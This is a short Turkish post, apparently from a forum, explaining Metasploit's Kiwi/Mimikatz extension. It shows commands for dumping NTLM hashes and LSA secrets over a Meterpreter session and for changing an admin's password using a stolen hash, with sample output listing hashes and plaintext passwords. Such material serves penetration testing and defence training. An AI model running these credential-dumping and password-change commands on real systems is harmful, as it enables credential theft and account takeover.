Metasploit'te Kiwi, Mimikatz modülünün bir parçasıdır ve Windows sistemlerinde kimlik doğrulama bilgilerini (parolalar, hash'ler, vb.) toplamak için kullanılır. Kiwi, genellikle Meterpreter oturumları üzerinden çalıştırılır.
Kiwi modülü, Metasploit'te Meterpreter oturumları üzerinden kimlik doğrulama bilgilerini toplamak için kullanılır. lsa_dump_sam komutu NTLM hash'lerini, lsa_dump_secrets komutu ise LSA secrets'i toplar. Ayrıca, password_change komutu ile parolalar değiştirilebilir. Bu araç, post-exploitation aşamasında oldukça faydalıdır.
NTLM Hash'lerini Toplama
lsa_dump_sam
NTLM hash'lerini toplamak için lsa_dump_sam komutunu kullanın. Bu komut, hedef sistemdeki tüm kullanıcı hesaplarının hash'lerini döker.
[+] Found SAM hashes:
User: Administrator
Hash: 1234567890abcdef1234567890abcdef
User: User1
Hash: abcdef1234567890abcdef1234567890
LSA Secrets Toplama
lsa_dump_secrets
LSA secrets, sistemin yerel güvenlik politikasını yönetmek için kullanılan hassas bilgileri içerir. lsa_dump_secrets komutunu kullanarak bu bilgileri toplayabilirsiniz.
[+] LSA Secrets:
[+] Secret: AdminPassword
Value: P@ssw0rd123
[+] Secret: ServiceAccountPassword
Value: S3rv1ceP@ss
Yeni Parola Atama
password_change -u Admin -n [NTLM hash of Admin acquired in previous step] -P NewPassword123
Bir kullanıcının parolasını NTLM hash'i ile değiştirmek için password_change komutunu kullanın.
[+] Password for Admin changed successfully.
Elinize sağlık hocam.